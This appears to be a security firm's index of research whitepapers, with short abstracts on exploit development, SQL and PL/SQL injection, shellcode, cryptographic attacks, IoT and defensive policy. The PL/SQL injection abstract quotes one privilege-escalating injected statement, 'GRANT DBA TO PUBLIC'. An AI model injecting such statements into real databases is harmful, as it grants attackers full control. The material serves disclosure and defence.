Whitepapers
Building WiMap the Wi-Fi Mapping Drone
We’ve published a whitepaper about how we built WiMap, which is a Wi-Fi mapping drone. The paper includes details of the methods used to create, from parts, a hexacopter capable of being controlled over 3/4G and equipped to perform wireless and infrastructure assessments. We’d love to hear your feedback via…
Exploiting CVE-2014-0282
This whitepaper details the vulnerability and examines some of the concepts needed for browser exploitation before describing how to construct a working exploit that exits gracefully. Download whitepaper Authored by Katy Winterborn
Whitepaper – Project Triforce: Run AFL On Everything (2017)
Six years ago, NCC Group researchers Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. Today, we’re releasing it for the curious reader and…
SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
Introduction netlink and nf_tables Overview Sets Expressions Set Expressions Stateful Expressions Expressions of Interest nft_lookup nft_dynset nft_connlimit Vulnerability Discovery CVE-2022-32250 Analysis Set Creation Set Deactivation Initial Limited UAF Write Exploitation Building an Initial Plan Offsets We Can Write at Into the UAF Chunk Hunting for Replacement Objects What Pointer Do…
Whitepaper – Practical Attacks on Machine Learning Systems
This paper collects a set of notes and research projects conducted by NCC Group on the topic of the security of Machine Learning (ML) systems. The objective is to provide some industry perspective to the academic community, while collating helpful references for security practitioners, to enable more effective security auditing…
Whitepaper – Double Fetch Vulnerabilities in C and C++
Double fetch vulnerabilities in C and C++ have been known about for a number of years. However, they can appear in multiple forms and can have varying outcomes. As much of this information is spread across various sources, this whitepaper draws the knowledge together into a single place, in order…
Research Paper – Machine Learning for Static Malware Analysis, with University College London
For the past few years, NCC Group has been an industry partner to the Centre for Doctoral Training in Data Intensive Science (CDT in DIS) at University College London (UCL). CDT is composed of a group of over 80 academics from across UCL in areas such as High Energy Physics,…
Whitepaper – Exploring the Security of KaiOS Mobile Applications
KaiOS is a mobile operating system, forked from the discontinued Firefox OS, in which all the mobile applications running on a KaiOS-based mobile device are built using web technologies, such as HTML, JavaScript, and CSS. In this independent research project, we demonstrate that six of the pre-installed mobile applications are…
Cyber Security of New Space Paper
NCC Group's Transport Security Practice has co-authored with the Surrey Center for Cyber Security and the Surrey Space Center a new paper titled 'Cyber security in New Space'. It provides analysis of the threats, challenges and key technologies related to the satellite industry.
Research Report – Zephyr and MCUboot Security Assessment
Authors: Jeremy Boone, Ilya Zhuravlev Over the years, NCC Group has audited countless embedded devices for our customers. Through these security assessments, we have observed that IoT devices are typically built using a hodgepodge of chipset vendor board support packages (BSP), bootloaders, SDKs, and an established Real Time Operating System…
Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities
By Aleksandar Kircanski and Terence Tarvis A good amount of effort has been dedicated to surveying and systematizing Ethereum smart contract security bug classes. There is, however, a gap in literature when it comes to surveying implementation-level security bugs that commonly occur in basic PoW blockchain node implementations, discovered during…
Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
By Sultan Qasim Khan Microcontrollers commonly include features to prevent the readout of sensitive information in internal storage. Such features are commonly referred to as readback protection or readout protection. This paper describes common readback protection implementation flaws, discusses techniques that can be used to defeat readback protection, and provides…
Whitepaper – A Tour of Curve 25519 in Erlang
By Eric Schorn An introduction to elliptic curve cryptography theory alongside a practical implementation in Erlang. This whitepaper may be downloaded below.
Security impact of IoT on the Enterprise
We are moving to a time where many ‘things’ that we know and use have the capability to be connected to a network either wired or wirelessly. The way we use technology is becoming more integrated in all aspects of our daily lives and is steadily integrating within the enterprise…
Secure Device Provisioning Best Practices: Heavy Truck Edition
The complexities of the heavy truck ecosystem poses challenges to the security of the ECU networks contained within the vehicles. This paper describes some of the major sources of complexity, and how each can be addressed to design and implement a secure robust ECU provisioning system. Such a system is…
An Introduction to Ultrasound Security Research
Over the past few years there has been an increase in the use of sound as a communications channel for device-to-device communications. This practice has been termed Data-Over-Sound (DOS) and has been billed as a cheap and easy to use alternative to traditional communications protocols such as Wi-Fi and Bluetooth.…
An Introduction to Quantum Computing for Security Professionals
Quantum computing is still in its infancy but is expected to cause major changes to the technology landscape in coming years. Its ability to massively reduce the time taken for processes normally requiring large amounts of processing power is already causing concerns about the future of cryptography and the resistance…
Cyber Security in UK Agriculture
This whitepaper addresses the cyber security threat to agriculture and the wider food network. The perspective and primary focus is the United Kingdom but the majority of observations on the structure of markets, technologies and related issues are largely applicable to other countries. Furthermore, some of the recommended actions identified in…
NCC Group Connected Health Whitepaper July 2019
Connected Health is a rapidly growing area with huge innovative possibilities and potential. This is mostly due to the uptake of digital technologies in the health and medical fields that support diagnosis, treatment and management of health conditions. It is however crucially important that security of Connected Health products, systems…
Whitepaper – Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone
Editor’s note: This work was also presented at ACM CCS 2019. Written by Keegan Ryan Trusted Execution Environments (TEEs) such as ARM TrustZone are in widespread usein both mobile and embedded devices, and they are used to protect sensitive secretswhile often sharing the same computational hardware as untrusted code. Althoughthere…
Assessing Unikernel Security
Abstract Unikernels are small, specialized, single-address-space machine images constructed by treating component applications and drivers like libraries and compiling them, along with a kernael and a thin OS layer, into a single binary blob. Proponents of unikernels claim that their smaller codebase and lack of excess services make them more efficient and secure than…
Use of Deserialisation in .NET Framework Methods and Classes
These days it is quite common to see a deserialisation flaw in a product. Although awareness around finding and exploiting this type of vulnerability is out there for security researchers, developers can still struggle with securing their code especially when they are not fully aware of dangerous methods and functionalities…
Nine years of bugs at NCC Group
As part of our vulnerability research work at NCC Group we find many vulnerabilities (bugs) in commercial products and systems and for the past nine years we have kept a detailed internal log of these bugs. In this whitepaper prepared by Matt Lewis, Research Director at NCC Group, we…
The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations
In this whitepaper*, nine different implementations of TLS were tested against cache attacks and seven were found to be vulnerable: OpenSSL, Amazon s2n, MbedTLS, Apple CoreTLS, Mozilla NSS, WolfSSL, and GnuTLS. The cat remains alive, with two lives left thanks to BearSSL (developed by NCC Group’s Thomas Pornin) and Google’s BoringSSL. The issues were disclosed back in August, and the teams…
Public cloud
Whenever an outage on one of these cloud providers occurs, or a data breach of information held by them, the immediate press coverage starts asking whether they really are as secure and reliable as traditionally managed servers. This whitepaper provides an overview of public cloud services and the steps to…
Improving Your Embedded Linux Security Posture With Yocto
Embedded systems are regularly found to lack modern security-focused designs and implementations, despite decades of advancements in the field of computer security. Although the emergence and adoption of projects such as Yocto and OpenEmbedded have made it easier to develop and maintain firmware for embedded Linux systems, NCC Group has…
The disadvantages of a blacklist-based approach to input validation
It’s not uncommon to find websites that attempt to validate user input and block code injection attacks using a blacklist of dangerous characters or keywords. Superficially, this might seem like a common-sense way to protect a website with minimum effort but it can prove to be extremely difficult to comprehensively…
Ethics in Security Testing
This paper discusses the similarities and differences between professional ethics in the information security industry and ethics in the hacker community. Sources of conflict and shared values of the two are discussed in order to find some reconciliation and come to an understanding of how a shared set of ethics…
Return of the hidden number problem
Abstract Side channels have long been recognised as a threat to the security of cryptographic applications. Implementations can unintentionally leak secret information through many channels, such as microarchitectural state changes in processors, changes in power consumption, or electromagnetic radiation. As a result of these threats, many implementations have been hardened to defend against these…
Open Banking: Security considerations & potential risks
The concept of Open Banking is an innovative one. However, as with any new developments surrounding sensitive financial information it is imperative to assess the security implications of these actions. Matthew Pettitt discusses the pros and cons of the planned implementation and potential risks of Open Banking in NCC Group’s…
The economics of defensive security
While there are many claims that cyber security is an indispensable necessary cost, there is also a body of opinion that cyber security does not always justify its costs and the financial impacts of a breach are frequently either exaggerated or unclear. As a response to these concerns, this whitepaper…
Integrity destroying malicious code for financial or geopolitical gain: A vision of the future?
“We’re entering a new world in which data may be more important than software.” Tim O’Reilly Following from our recent CISO research council, our research team have put together this whitepaper, which explores the evolutionary steps in ransomware and malicious code and what NCC Group’s current perspective is. Ransomware as…
Mobile & web browser credential management: Security implications, attack cases & mitigations
With the exponential increase of online services over the last decade, it is no surprise that the theft of credentials from poorly-secured applications is a growing concern and data breaches are becoming more of a regular occurrence. Even if we manage to secure and lock down these applications, do we…
SOC maturity & capability
Security is a high priority for most organisations. A string of high priority breaches in big multinational companies has brought home the threat that all organisations face in the modern world. Therefore, a growing number of companies are considering how to best protect themselves and reduce the impact of a…
Automated Reverse Engineering of Relationships Between Data Structures in C++ Binaries
Real-time, memory-level interoperability with a closed-source binary may be desired for a number of reasons. In order to read from and write to specific data structures within a target process’ memory, external software must have knowledge of how to access these structures at any given time. Since many objects are…
Pointer Sequence Reverser (PSR)
Nick Collisson, the author of Pointer Sequence Reverser (PSR), occasionally found himself with the need to write software that integrates deeply into an existing closed-source Windows binary and alters, or enhances, its behaviour. Such software must be able to access the data within the running process for reading and writing.…
Adversarial Machine Learning: Approaches & defences
Most of us interact with Artificial Intelligence (AI) or Machine Learning (ML) on a daily basis without even knowing; from Google translate, to facial recognition software on our mobile phones and digital assistance in financial services or call centres. It is a growing market with ever increasing possibilities across all…
eBook: Breach notification under GDPR – How to communicate a personal data breach
Working closely with our clients both on site or at events, we are finding that several remain unclear on the topic of breach notification under GDPR. There seems to be little, focused guidance on the topic despite the fact that the new regulation will be enforced from May 2018. This…
Managing PowerShell in a modern corporate environment
Following from our recent CISO research council, our research team have put together this whitepaper, which explores the use of PowerShell in a modern corporate environment and how to mitigate the associated threats. Since its incarnation in 2006, PowerShell has grown to be a powerful and extensible management tool, allowing for…
Securing the continuous integration process
Continuous integration (CI) has long left the stage of experimental practices and moved into mainstream software development. It is used everywhere from start-ups to large organisations, in a variety of technology stacks and problem domains, from web applications to embedded software. However, the security implications of introducing CI are often…
Endpoint connectivity
The popularity of USB usage has grown and it has become a common vehicle for spreading malware. As such, the need to protect IT assets from a cyber attack is paramount and from a physical endpoint perspective, this presents a challenging dynamic when wanting to prevent a data breach via…
Database Security Brief: The Oracle Critical Patch Update for April 2007
On the 17th April 2007 Oracle released their 10th Critical Patch Update. This brief discusses the database flaws and EM01 which relates to the Intelligent Agent. Many of the flaws being patched are old issues. For example, DB01 relates to an issue first reported to Oracle in 2002 and another in June…
Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention Mechanisms (XPMs) on the Windows platform
Buffer Underruns and Stack Protection Starting with Windows 2003 Server, Microsoft introduced a number of Exploitation Prevention Mechanisms (XPMs) into their software. Over time these XPMs were refined as weaknesses were discovered [1][2] and more XPMs were introduced. Today the XPMs have been added to Windows XP Service Pack 2…
Data-mining with SQL Injection and Inference
When drilling for data via SQL injection there are three classes of attack – inband, out-of-band and the relatively unknown inference attack. Inband attacks extract data over the same channel between the client and the web server, for example, results are embedded in a web page via a union select. Out-of-band attacks employ…
The Pharming Guide – Understanding and preventing DNS related attacks by phishers
Exploiting well knows flaws in DNS services and the way in which host names are resolved to IP addresses, Phishers have upped the ante in the cyber war for control of a customer’s online identity for financial gain. A grouping attack vectors now referred to as “Pharming”, affects the fundamental…
Weak Randomness Part I – Linear Congruential Random Number Generators
The objective of this series of papers is to describe the mathematical properties of some of the more common pseudo-random sequence generators and to show how they can be attacked by illustrating the principles with real-world bugs. The series demonstrates how weak randomness can be identified, used to compromise real-world systems, and defended against.…
Exploiting PL/SQL Injection Flaws with only CREATE SESSION Privileges
When exploiting PL/SQL injection flaws in SELECT/UPDATE/INSERT/DELETE statements it has long been known that if an attacker can create their own function, and inject this, then it is possible for them to execute arbitrary PL/SQL code – for example EXECUTE IMMEDIATE ‘GRANT DBA TO PUBLIC’. Of course, if the attacker can’t create their own…
Blind Exploitation of Stack Overflow Vulnerabilities
This paper presents a number of technical discussion points relating to the potential for exploiting stack overflow vulnerabilities without having direct access to the application which is to be exploited. The points raised in this paper discuss the key issues which would need to be overcome in order to do this, as well…
Slotting Security into Corporate Development
Technology trail-blazing organisations such as large financial institutions have been working to secure their custom applications for several years, but the second-tier “technology following” organisations have been too slow to follow. This is now rapidly changing due to recent bad press following many highly publicised security compromises. In many of…
Creating Arbitrary Shellcode In Unicode Expanded Strings
The paper is intended to be read by the portion of the security community responsible for creating protective mechanisms to guard against “shellcode” type security flaws; the intention is to remove the perception that Unicode buffer overflows are non exploitable and thereby improve the general state of network security. It…
Violating Database – Enforced Security Mechanisms
This paper discusses the feasibility of violating the access control, authentication and audit mechanisms of a running process in the Windows server operating systems. Specifically, it discusses the feasibility of totally disabling application – enforced access control in a running service, taking SQL Server 2000 as a sizeable and meaningful…
Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
This paper presents several methods of bypassing the protection mechanism built into Microsoft’s Windows 2003 Server that attempts to prevent the exploitation of stack based buffer overflows. Recommendations about how to thwart these attacks are made where appropriate. Microsoft is committed to security. I’ve been playing with Microsoft products, as…
Non-flood/non-volumetric Distributed Denial of Service (DDoS)
Over the last two decades, both Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks have been growing in frequency, complexity and volume. Traditionally, these attacks are associated with botnets and large amounts of traffic aimed at disrupting Internet-facing services. However, while the goal of these attacks remains…
E-mail Spoofing and CDONTS.NEWMAIL
Many IIS web servers running ASP applications will use the CDONTS.NEWMAIL object to provide the functionality for feedback or contact forms. This paper will examine how the CDONTS.NEWMAIL object can be used by attackers to send arbitrary e-mails via the vulnerable web server and what must be done to prevent an online ASP…
Dangling Cursor Snarfing: A New Class of Attack in Oracle
In Oracle, a failure to close cursors created and used by DBMS_SQL or a failure to clean up open cursors in the event of an exception can lead to a security hole. If the cursor in question has been created by higher privileged code and left hanging then it’s possible for a low…
Database Servers on Windows XP and the unintended consequences of simple file sharing
This paper presents some unexpected consequences of running database servers on Windows XP with Simple File Sharing enabled. In the real world, this kind of setup would typically be a developer’s system and as it turns out, in some cases depending on the database software, you might not just be sharing your files…
DNS Pinning and Web Proxies
DNS-based attacks can be used to perform a partial breach of browser same origin restrictions in some situations, enabling a malicious web site to perform two-way interaction with a different domain. The attacks that are normally conceived against browser-based DNS pinning are capable of being resolved through additional safeguards within…
Which database is more secure? Oracle vs. Microsoft
This paper will examine the differences between the security posture of Microsoft’s SQL Server and Oracle’s RDBMS based upon flaws reported by external security researchers and since fixed by the vendor in question. Only flaws affecting the database server software itself have been considered in compiling this data so issues that affect, for example,…
Variations in Exploit methods between Linux and Windows
This paper will examine the differences and commonality in the way a vulnerability common to both Windows and Linux is exploited on each system. The VulnerabilityThe vulnerability that will be discussed in this paper is a classic stack based overflow in OracleÕs RDBMS 9.2.0.1. As well as offering the standard SQL service,…
Using graph databases to assess the security of thingernets based on the thingabilities and thingertivity of things
“Security within the Internet of Things (IoT) is currently below par.” The statement above derives from many observations across our work in IoT (and that of the wider security research community) in addition to a myriad of regular, publicly reported issues and security concerns with IoT devices and their infrastructures.…
Beyond data loss prevention
Data Loss Prevention (DLP) is a security control aimed at highlighting when sensitive data leaves the corporate network or is accessed without authorisation. A DLP solution can be a great asset to a business and support a range of security goals and compliance. It can be an invaluable safety net…
How to protect yourself & your organisation from phishing attacks
With one click, his entire business was in the hands of someone else. Sensitive company information, bank account details, social media profiles, various other usernames and passwords. All stolen by a cyber criminal in a convincing phishing attempt. The email he’d received looked legitimate. It was just a simple request…
Rise of the machines: Machine Learning & its cyber security applications
“By far the greatest danger of Artificial Intelligence is that people conclude too early that they understand it.” Eliezer Yudkowsky At NCC Group, we are researching Machine Learning (ML) and Artificial Intelligence (AI) from a number of different angles in order to fully understand the pros and cons of ML…
Combating Java Deserialisation Vulnerabilities with Look-Ahead Object Input Streams (LAOIS)
Abstract Java Serialisation is an important and useful feature of Core Java that allows developers to transform a graph of Java objects into a stream of bytes for storage or transmission and then back into a graph of Java objects. Unfortunately, the Java Serialisation architecture is highly insecure and has led…
Latest threats to the connected car & intelligent transport ecosystem
The modern vehicle has become increasingly computerised as the demand for cleaner emissions and better transport safety for drivers and pedestrians has grown. Numerous initiatives are currently underway to begin to address this threat and to bring the principles used within traditional enterprise environments (such as the Secure Development Lifecycle)…
Network Attached Security: Attacking a Synology NAS
Abstract Network-Attached Storage (NAS) devices are a popular way for people to store and share their photos, videos and documents. Securing these devices is essential as they can contain sensitive information and are often exposed to the Internet. Because Synology is one of the top manufacturers of NAS devices, we chose to…
Accessing Private Fields Outside of Classes in Java
NCC Group’s Robert Seacord explores the underbelly of the Java language in his whitepaper on “Accessing Private Fields Outside of Classes in Java.” According to Robert, “The use of nested classes in Java programs weakens the accessibility guarantees of the language and allows private fields to be accessed from outside…
Understanding the insider threat & how to mitigate it
It is a widely held belief that the vast majority of threats to businesses are from outside attackers, with the stereotypical view of hackers trying to make money through crime. The problem with this viewpoint is that it does not consider the threat from a malicious insider. There is a…
Matty McMattface: Security implications, mitigations & testing strategies for biometric facial recognition systems
Biometric facial recognition is becoming an increasingly popular mechanism for authenticating users in online and mobile environments. In addition, it is continually being adopted for physical access control, whether at border controls such as airports or within secure facilities to enforce strict access control (and/or time and attendance tracking) to…
Encryption at rest: Not the panacea to data protection
Following from our recent CISO research council, our research team have put together this whitepaper, which explores encryption at rest. Encryption at rest is not a panacea to data protection due to its complexity and the utility of data. Often, misconceptions can (and do) arise whereby it is believed that…
Applying normalised compression distance for architecture classification
An NCC Group whitepaper: Applying normalised compression distance for architecture classification When working with malware research and black box penetration testing, it is not always clear what data you are working on and in order to disassemble binaries properly, one needs to know the architecture that the binary has been…
General Data Protection Regulation: Knowing your data
“GDPR is about giving people back control of their personal data.” The EU General Data Protection Regulation (GDPR) will come into force across all member states, including the UK, on 25 May 2018. It will provide a common baseline for data protection across all of the member states and its consistent approach and requirements will benefit…
Mergers & Acquisitions (M&A) cyber security due diligence
An NCC Group whitepaper Regardless of the size, scope, geography or sector of your organisation, there are common elements that should be considered when it comes to cyber security due diligence during the M A process. This whitepaper aims to cover the risks, opportunities and responsibilities associated with cyber security…
Best practices with BYOD
In today’s modern society the requirement for employees to be based within a corporate office is minimal, largely due to remote working gaining prominence. The cost to provide remote working or mobile technology to employees can, however, be expensive. An ideal solution to this cost issue is enabling the employee…
Understanding cyber risk management vs uncertainty with confidence in 2017
Every organisation faces uncertainty and this is often a key challenge in achieving its objectives. Much of this uncertainty comes from an inability to accurately predict future events. Generally, we can define a potential future event that could affect an organisation’s objectives as a ‘risk’ and the process of forecasting…
State-of-the-art email risk
Email was not designed to be used the way it is today. Organisations rely on email for daily business communication and while most are protecting against low-level threats, more sophisticated email-based attacks are on the rise. This NCC Group whitepaper highlights the overall risks that organisations face when using email…
Ransomware: what organisations can do to survive
We’ve published a short eBook based on our experience of dealing with numerous ransomware cases in the last few years. The eBook is designed to provide real-world advice as to what organisations should do to minimise the likelihood of initial infection as well as limit any impact should that fail.…
Research Insights Volume 8 – Hardware Design: FPGA Security Risks
FPGA stands for field-programmable gate array. An FPGA is a logic device whose function can be changed while the device is in place within its working environment, allowing the hardware processing of a system to be altered by an external configuration loading process. Their very nature creates potential security risks, and…
Optimum Routers: Researching Managed Routers
Abstract ISPs have moved to managed routers due to increased customer service calls with the question “What is my Wi-Fi password?” Managed routers allow complete remote management of a user’s home network and have facilitated customer service centers across ISPs. In this paper, we discuss the process of finding vulnerabilities in remotely managed routers,…
Peeling back the layers on defence in depth…knowing your onions
Peeling back the layers on defence in depth…knowing your onions An NCC Group whitepaper Is your organisation fully prepared for malicious attacks from both motivated external attackers and internal threat actors? As the threat landscape continues to evolve it is vital that organisations understand where the threats are and how…
End-of-life pragmatism
End-of-life pragmatism – an NCC Group whitepaper Does your organisation have a robust IT Refresh Policy in place? One of the main concerns relating to the replacement of IT infrastructure is the cost. The risk of introducing compatibility issues and, ultimately, downtime also causes anxiety. However, exploitation of vulnerabilities in…
Elephant in the Boardroom Survey 2016
UK plc wants tougher cyber regulation and more punishment for failings 71% of UK board directors want companies to be penalised for failing to meet basic cyber security requirements, according to new research from global cyber security and risk mitigation expert NCC Group. In what appears to be a sea…
Research Insights Volume 9 – Modern Security Vulnerability Discovery
NCC Group’s latest Research Insights paper provides a view on modern vulnerability discovery approaches.The identification of vulnerabilities and understanding what is involved in their exploitation has numerous applications in both the attack and defence side of cyber security. The way in which software vulnerabilities are discovered has evolved considerably over…
Post-quantum cryptography overview
Organisations that need to keep long-term secrets, or which are designing systems that will be in use for ten or more years, need to plan for a post-quantum-computing world. This whitepaper gives a short introduction and overview of post-quantum cryptography. We discuss why post-quantum crypto is needed and provide handles…
How will GDPR impact your communications?
We’ve published a short eBook about the potential impact General Data Protection Regulation (GDPR) may have on your marketing activity. Regardless of when or how the various negotiations develop with the EU, the UK’s data protection standards will have to be equivalent to the EU’s GDPR. The eBook is designed…
My name is Matt – My voice is my password
Voice biometrics are becoming an attractive mechanism for authenticating users in online and mobile environments. They may, however, not always be the best choice of authentication mechanism, depending on the performance and assurance requirements of the underlying application. A feasibility study should always be performed on the use of biometrics…
My Hash is My Passport: Understanding Web and Mobile Authentication
Andrew Tanenbaum once said, “The great thing about standards is there are so many to choose from.” That’s especially true in the realm of web and mobile application authentication. From Base-64 to OAuth, there are nearly as many ways to send your password to a server as there are ways…
How to Backdoor Diffie-Hellman
Lately, several backdoors in cryptographic constructions, protocols and implementations have been surfacing in the wild: Dual EC in RSA’s B-Safe product, a modified Dual EC in Juniper Networks’s operating system ScreenOS and a non-prime modulus in the open-source tool socat. Many papers have already discussed the fragility of cryptographic constructions…
Local network compromise despite good patching
A common misconception by Windows system administrators is that keeping operating systems fully updated is sufficient to keep them secure. However, even on a network which is fully patched and using the latest Windows operating systems, it is often trivial for an internal attacker to obtain user credentials, and in…
An Adaptive-Ciphertext Attack Against “I ⊕ C” Block Cipher Modes With an Oracle
Authored by: Tom Ritter Download Whitepaper
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Authored by: Brad Hill Download whitepaper
Blind Security Testing – An Evolutionary Approach
Authored by: Scott Stender Download whitepaper
Building Security In: Software Penetration Testing
Authored by: Scott Stender Download whitepaper
Command Injection in XML Signatures and Encryption
Authored by: Brad Hill Download whitepaper
Common Flaws of Distributed Identity and Authentication Systems
Authored by: Brad Hill Download whitepaper
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Authored by: Jesse Burns Download whitepaper
Hunting SQL Injection Bugs
Also published on the MicroSoft | TechNet Library. Authored by: Brad Hill | Geng Yang Download whitepaper
IAX Voice Over-IP Security
Authored by: Himanshu Dwivedi | Zane Lackey Download whitepaper
ProxMon: Automating Web Application Penetration Testing
Authored by: Jonathan Wilkins Download whitepaper
Secure Application Development on Facebook
Authored by: Justine Osborne Download whitepaper
Secure Session Management With Cookies for Web Applications
Authored by: Chris Palmer Download whitepaper
Weaknesses and Best Practices of Public Key Kerberos with Smart Cards
Authored by: Brad Hill Download Whitepaper
An Introduction to Authenticated Encryption
Authored by: Shawn Fitzgerald Download whitepaper
Browser Extension Password Managers
Authored by: Paul Youn | Marc Blanchou Download whitepaper
Introducing idb-Simplified Blackbox iOS App Pentesting
Authored by Daniel A. MayerShmooCon 2014, January 17-19thWashington, D.C. Download whitepaper
The factoring dead: Preparing for the cryptopocalypse
Authored by: Javed Samuel Download whitepaper
Analysis of Boomerang Differential Trials via a SAT-Based Constraint Solver URSA
Analysis of Boomerang Differential Trails via a SAT-Based Constraint Solver URSA Paper to be presented at ACNS 2015. Abstract Obtaining differential patterns over many rounds of a cryptographic primitive often requires working on local differential trail analysis. In the case of boomerang and rectangle attacks, merging two short differential trails into…
Internet of Things Security
Abstract The Internet of Things (IoT) is an emerging phenomenon where different kinds of devices that were previously not networked are being connected to networks. Examples include network connected thermostats, light bulbs, and door locks. These newly networked devices present additional attack surfaces, and due to the ad hoc nature of their implementations,…
Secure Messaging for Normal People
In this paper, Justin Engler discusses the challenges of secure messaging for normal people based on his presentation entitled “Secure Messaging” from DEF CON 23. “Secure” messaging programs and protocols continue to proliferate, and crypto expertscan debate their minutiae, but there is very little information available to help therest of…
Understanding and Hardening Linux Containers
Operating System virtualisation is an attractive feature for efficiency, speed and modern application deployment, amid questionable security. Recent advancements of the Linux kernel have coalesced for simple yet powerful OS virtualisation via Linux Containers, as implemented by LXC, Docker, and CoreOS Rkt among others. Recent container focused start-ups such as…
Private sector cyber resilience and the role of data diodes
Abstract: Governments and businesses recognise that absolute cyber security is neither possible nor practical. In the public sector the risks are in part addressed by the adoption of various compensating controls that align with various protective marking schemes. The nations which have adopted these controls have also developed resiliencestrategies, in…
General Data Protection Regulation – are you ready?
With the finalisation of the General Data Protection Regulation (GDPR) it is time for businesses to take stock and prepare for the requirements which will soon be imposed. The GDPR replaces the 1995 EU directive (Directive 95/46/EC ) and begins a new chapter in European privacy. The regulation was published…
Business Insights: Cyber Security in the Financial Sector
Not only are cyber attacks becoming more frequent, they are also becoming more persistent, targeted and at times sophisticated, often causing widespread impact. While some boards and executives of financial services (FS) organisations are being urged to place cyber security at the top of their risk agenda, there still often…
The Importance of a Cryptographic Review
Cryptography is an underpinning of every organisation’s data security. It is as simple as the correct deployment of TLS and as complicated as bespoke protocols for software updates. This technology is an integral part of an organisation’s security infrastructure. With the field constantly evolving, having a dedicated review is becoming increasingly important. Download…
osquery Application Security Assessment Public Report
In an audit commissioned by Facebook, NCC Group consultants Raphael Salas, Andrew Rahimi and Robert Seacord provided an audit of the osquery framework for operating system instrumentation. osquery represents operating system details and events as SQL tables that can be queried real-time in complex ways. The audit covered the osquery core and…
Abusing Privileged and Unprivileged Linux Containers
In this paper, we’ll discuss several security pitfalls with Linux containers. Many of them are intrinsic to the design of the container systems, or may be the result of insecure defaults. We’ll analyse historical container attacks, and how they are currently mitigated. We will then examine several novel or poorly…
A few notes on usefully exploiting libstagefright on Android 5.x
At NCC Group, a colleague and I recently spent some time trying to develop a more robust exploit for the Android libstagefright bug CVE-2015-3684. This is a bug that persisted through the patches Joshua Drake (jduck) originally provided to Google, so a few more firmware versions are vulnerable. In this…
eBook – Do you know how your organisation would react in a real-world attack scenario?
Do you know how your organisation would react in a real-world attack scenario? Find out where your weaknesses lie with a Red Team Assessment and take action now to improve your security posture. In today’s threat landscape, how to mitigate risk and prevent an organisation from becoming victim to a…
Erlang Security 101
This whitepaper is about Erlang Security. NCC Group’s Security Technical Assurance team performs code reviews for clients on numerous different programming languages. Some are well understood from a security perspective (e.g. C, C++, C#, PHP and Python etc.) and some less so. We’ve been doing Erlang security focused code reviews…
Threat Intelligence: Benefits for the Enterprise
Today we have released a new whitepaper titled: ‘Threat Intelligence: Benefits for the Enterprise’. This paper builds on a number of supporting blog posts we’ve published over the last seven months, namely: Understanding commercial sector threat intelligence and cyber security Threat intelligence: what we can learn from malware analysis Threat…
Best Practices for the use of Static Code Analysis within a Real-World Secure Development Lifecycle
Static application security testing (SAST) is the analysis of computer software that is performed without the need to actually execute the program. The term is usually applied to analysis performed by an automated tool, whereas human analysis is typically called security-focused code review. The primary objective of SAST is to…
Secure Device Manufacturing: Supply Chain Security Resilience
Today the production of hardware devices involves multiple suppliers at various stages of the production and support lifecycle. There is no electronics manufacturer who manufactures every single component of a device in their own factory. As such, and has been demonstrated, these hardware and manufacturing supply chains introduce risk that…
eBook – Planning a robust incident response process
Author: David Cannings This eBook is a simple workbook that walks you through some of the key takeaways to building your own incident response process in your organisation. It provides you with some insight into why a robust incident response plan is needed, the kinds of things that are at…
HDMI Ethernet Channel
HDMI is more than just a toll for displaying video and with increasing numbers of new laptops and PCs using the function it is important for organisations to understand the potential security issues that are likely to arise as the protocols start to become more widely used. This paper will…
Advanced SQL Injection in SQL Server Applications
In this paper the author will explain, in detail, the common SQL injection technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. The paper will also cover the various ways in which SQL can be injected into the application and addresses some of the…
Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 Microsoft Office CTaskSymbol Use-After-Free Vulnerability
Until November 2013 (CVE-2013-3906), exploit primitives for Object Linking and Embedding (OLE) objects were not discussed publicly. This changed at BlackHat USA 2015, when Haifei Bing presented “Attacking Interoperability: An OLE Edition”. This talk examined the internals of OLE embedding. Over the past few months, several malware campaigns targeting high-profile…
Porting the Misfortune Cookie Exploit: A Look into Router Exploitation Using the TD-8817
By using just a few commonly available tools and a bit of time, it is possible to port the Misfortune Cookie exploit to exploit a TD-8817 V8 router running the latest firmware and gain reliable control over its web interface without crashing the router, even after repeated exploitation attempts. In…
Research Insights Volume 6: Common Issues with Environment Breakouts
Research Insights Volume 6: Common Issues with Environment Breakouts Due to the rising trend in organisations implementing bring your own device (BYOD) and remote access working, IT departments are facing the ongoing risks of securing devices they neither own or control. This has led to a rise in the number…
Common Security Issues in Financially-Oriented Web Applications
A guideline for penetration testers to assess ecommerce and financial services applications. This document summarises NCC Group’s experience of assessing ecommerce and financial services applications, providing a checklist of common security issues seen in financial services web applications. In NCC Group’s experience, one of the best ways to identify the…
Research Insights Volume 3 – How are we breaking in: Mobile Security
The proliferation of the personal and business use of mobile devices has created a strong demand for mobile security assurance. Mobile apps and devices can suffer from many of the same vulnerabilities as traditional systems but also require new approaches to security testing and risk assessment. This white paper looks to highlight some of…
Exploiting MS15-061 Use-After-Free Windows Kernel Vulnerability
tl;dr In June 2015, Microsoft released the MS15-61 advisory, to address a number of vulnerabilities. Today we’ve released a detailed analysis of one of these vulnerabilities, in the win32k.sys driver, and documented the necessary details for exploiting this class of vulnerability on Microsoft Windows 7 Service Pack 1. This is…
Password and brute-force mitigation policies
The @NCCGroupInfosec team performs security assessments across many different sectors and technologies. Regardless of the system being assessed, one of the most common issues we identify pertains to the use of weak passwords – permitted by an inadequate password policy. Systems that do not enforce a strong password policy can…
Understanding Ransomware: Impact, Evolution and Defensive Strategies
This whitepaper, produced by our Cyber Defence Operations team, is about the understanding of ransomware. It examines the impact, evolution and defensive strategies that can be employed by organisations. It is primarily focused on Microsoft Windows due to the historic prevalence and devastating impact on ransomware on this platform, but…
Writing Small Shellcode
